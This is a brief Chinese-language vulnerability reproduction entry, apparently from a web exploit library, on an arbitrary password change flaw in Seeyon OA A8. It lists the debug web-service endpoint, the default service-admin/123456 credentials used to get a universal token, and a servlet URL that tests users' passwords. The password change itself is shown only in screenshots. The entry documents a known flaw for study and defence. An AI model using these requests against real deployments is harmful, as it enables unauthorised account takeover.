009-致远OA A8 任意用户密码修改漏洞

# 致远OA A8 任意用户密码修改漏洞

### 一、漏洞简介

### 二、漏洞影响

致远OA A8

### 三、复现过程

“`bash
http://url/seeyon/services/authorityService?wsdl
“`

通过调试接口的默认用户 userName:service-admin password:123456 获取万能Token之后可以修改任意用户密码。

![](/static/lingzu/images/15897241026248.png)

访问

“`bash
http://url/seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=zw&P_2_String=wooyun
“`

返回false 说明zw密码不正确

![](/static/lingzu/images/15897241222315.png)

修改密码

![](/static/lingzu/images/15897241286843.png)

![](/static/lingzu/images/15897241326731.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容